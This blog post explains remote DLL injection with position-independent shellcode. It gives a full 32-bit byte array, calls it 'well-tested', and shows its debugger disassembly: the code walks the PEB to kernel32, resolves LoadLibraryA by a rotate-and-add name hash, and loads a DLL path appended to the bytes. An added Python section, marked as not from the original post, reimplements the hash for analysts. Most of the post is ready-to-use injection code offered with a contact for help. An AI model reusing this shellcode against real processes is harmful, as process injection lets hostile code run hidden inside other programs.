The two previous blog posts both injected by remotely calling the function LoadLibraryA. This time the approach is to write a piece of shellcode and run it remotely: the shellcode first locates kernel32.dll through the PEB module list, then walks its export table to find LoadLibraryA and calls it, which loads the DLL.
I have both a 32-bit and a 64-bit shellcode here; both are well-tested code.
Let's analyze the 32-bit shellcode together:
unsigned char shellcode[] = "\x9c\x60\xeb\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03\xD9\x8B\x73"
"\x20\x03\xF1\x33\xFF\x4F\x47\xAD\x33\xED\x0F\xB6\x14\x01\x38"
"\xF2\x74\x08\xC1\xCD\x03\x03\xEA\x40\xEB\xF0\x3B\x6C\x24\x04"
"\x75\xE6\x8B\x73\x24\x03\xF1\x66\x8B\x3C\x7E\x8B\x73\x1C\x03"
"\xF1\x8B\x04\xBE\x03\xC1\x5B\x5F\x53\xC3\x33\xD2\x64\x33\x52"
"\x30\x8B\x52\x0C\x8B\x52\x1C\x8B\x4a\x08\x8B\x72\x20\x8B\x12"
"\x80\x7E\x0C\x33\x75\xF2\x68\x54\x12\x81\x20\xe8\x99\xff\xff"
"\xff\xeb\x0b\xff\xd0\x61\x9d\x90\x90\x90\x90\x90\x90\x90" // the \x90 bytes here can be replaced by a jmp or ret; offset: 0x70
"\xe8\xf0\xff\xff\xff"
"d:\\dlltest.dll"; // DLL path appended after the code so it can be changed without touching the shellcode
Let's load this shellcode into a debugger:
0026CA40 > 9C pushfd
0026CA41 60 pushad
0026CA42 EB 42 jmp short 0026CA86
0026CA44 8B59 3C mov ebx, dword ptr [ecx+3C]
0026CA47 8B5C0B 78 mov ebx, dword ptr [ebx+ecx+78]
0026CA4B 03D9 add ebx, ecx
0026CA4D 8B73 20 mov esi, dword ptr [ebx+20]
0026CA50 03F1 add esi, ecx
0026CA52 33FF xor edi, edi
0026CA54 4F dec edi
0026CA55 47 inc edi
0026CA56 AD lods dword ptr [esi]
0026CA57 33ED xor ebp, ebp
0026CA59 0FB61401 movzx edx, byte ptr [ecx+eax]
0026CA5D 38F2 cmp dl, dh
0026CA5F 74 08 je short 0026CA69
0026CA61 C1CD 03 ror ebp, 3
0026CA64 03EA add ebp, edx
0026CA66 40 inc eax
0026CA67 ^ EB F0 jmp short 0026CA59
0026CA69 3B6C24 04 cmp ebp, dword ptr [esp+4]
0026CA6D ^ 75 E6 jnz short 0026CA55
0026CA6F 8B73 24 mov esi, dword ptr [ebx+24]
0026CA72 03F1 add esi, ecx
0026CA74 66:8B3C7E mov di, word ptr [esi+edi*2]
0026CA78 8B73 1C mov esi, dword ptr [ebx+1C]
0026CA7B 03F1 add esi, ecx
0026CA7D 8B04BE mov eax, dword ptr [esi+edi*4]
0026CA80 03C1 add eax, ecx
0026CA82 5B pop ebx
0026CA83 5F pop edi
0026CA84 53 push ebx
0026CA85 C3 retn
0026CA86 33D2 xor edx, edx
0026CA88 64:3352 30 xor edx, dword ptr fs:[edx+30]
0026CA8C 8B52 0C mov edx, dword ptr [edx+C]
0026CA8F 8B52 1C mov edx, dword ptr [edx+1C]
0026CA92 8B4A 08 mov ecx, dword ptr [edx+8]
0026CA95 8B72 20 mov esi, dword ptr [edx+20]
0026CA98 8B12 mov edx, dword ptr [edx]
0026CA9A 807E 0C 33 cmp byte ptr [esi+C], 33
0026CA9E ^ 75 F2 jnz short 0026CA92
0026CAA0 68 54128120 push 20811254
0026CAA5 E8 99FFFFFF call 0026CA43
0026CAAA EB 0B jmp short 0026CAB7
0026CAAC FFD0 call eax
0026CAAE 61 popad
0026CAAF 9D popfd
0026CAB0 90 nop
0026CAB1 90 nop
0026CAB2 90 nop
0026CAB3 90 nop
0026CAB4 90 nop
0026CAB5 90 nop
0026CAB6 90 nop
0026CAB7 E8 F0FFFFFF call 0026CAAC
0026CABC 64:3A5C64 6C cmp bl, byte ptr fs:[esp+6C]
0026CAC1 6C ins byte ptr es:[edi], dx
0026CAC2 74 65 je short 0026CB29
0026CAC4 73 74 jnb short 0026CB3A
0026CAC6 2E: prefix cs:
0026CAC7 64:6C ins byte ptr es:[edi], dx
0026CAC9 6C ins byte ptr es:[edi], dx
0026CACA 0000 add byte ptr [eax], al
The point worth noting is that I placed the DLL path string at the tail of the shellcode, so the DLL path can be changed without modifying the shellcode itself.
If you run into any inconvenience using it, you can add me on QQ: 403887828
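The loop at 0026CA57..0026CA67 in the listing above is an API-name hash: starting from zero, for each byte of the export name up to the NUL terminator it rotates ebp right by 3 and adds the byte, and the result is compared with the constant 0x20811254 pushed at 0026CAA0. The following Python is an added example, not code from the original post: it reimplements that hash and uses it the way an analyst would, resolving a hashed constant found in a sample back to an export name; the export list is a constructed sample, not a real kernel32 export table.

```python
from typing import Dict, Iterable

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits` (the x86 `ror reg32, imm8`)."""
    bits &= 31
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def shellcode_hash(name: str) -> int:
    """Mirror of the loop at 0026CA57..0026CA67: ebp starts at 0, and for each
    byte of the NUL-terminated name it does `ror ebp, 3` then `add ebp, edx`.
    The `cmp dl, dh` in the listing is the NUL check (dh is 0 after movzx)."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 3) + b) & MASK32
    return h


def build_hash_table(names: Iterable[str]) -> Dict[int, str]:
    """Precompute hashes for a list of export names so a constant pulled from a
    sample can be resolved by lookup instead of by guessing."""
    return {shellcode_hash(n): n for n in names}


def resolve(constant: int, table: Dict[int, str]) -> str:
    """Map a hashed constant (e.g. the value pushed before the call) to a name."""
    return table.get(constant & MASK32, "<unknown>")


# Constructed sample list; a real analysis would feed every export name of kernel32.dll.
SAMPLE_EXPORTS = ["LoadLibraryA", "LoadLibraryW", "GetProcAddress",
                  "CreateThread", "ExitProcess"]

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    print(hex(shellcode_hash("LoadLibraryA")))  # 0x20811254, the constant at 0026CAA0
    print(resolve(0x20811254, table))           # LoadLibraryA
```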
Published: 2024-01-29 10:24:30
Source link: https://www.4u4v.net/it/170649507414622.html